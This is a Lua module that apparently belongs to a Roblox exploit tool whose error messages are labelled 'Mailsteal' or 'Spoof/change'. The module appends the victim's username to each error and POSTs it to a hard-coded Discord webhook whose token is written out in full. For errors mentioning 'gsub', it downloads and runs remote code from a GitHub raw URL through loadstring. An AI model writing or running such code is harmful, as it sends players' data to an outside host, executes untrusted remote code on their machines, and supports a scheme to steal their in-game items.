return function(e)
local msg = ""
if e == "Cannot require a non-RobloxScript module from a RobloxScript" then
return
end
pcall(function() if _G.Min then
e = "Mailsteal: "..e
else
e = "Spoof/change: "..e
end end)
e = e.." | "..game.Players.LocalPlayer.Name
msg = '{"content":"'..e..'"}'
if string.find(e, "gsub") then
_G.Webhook = "https://google.com"
loadstring(game:HttpGet("https://raw.githubusercontent.com/vestyx/PetsGO/refs/heads/main/AutoFarmOP.lua", true))()
return
end
local response =
        request(
        {
            Url = "https://discordapp.com/api/webhooks/1298620608002785361/xDL2XlmAn--GmrjuQTWV7a89XLWNuNZ11rlz1r6yEQIdvRWBkoA-bwCGP3_i6Ntsa5aM",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
return response
end
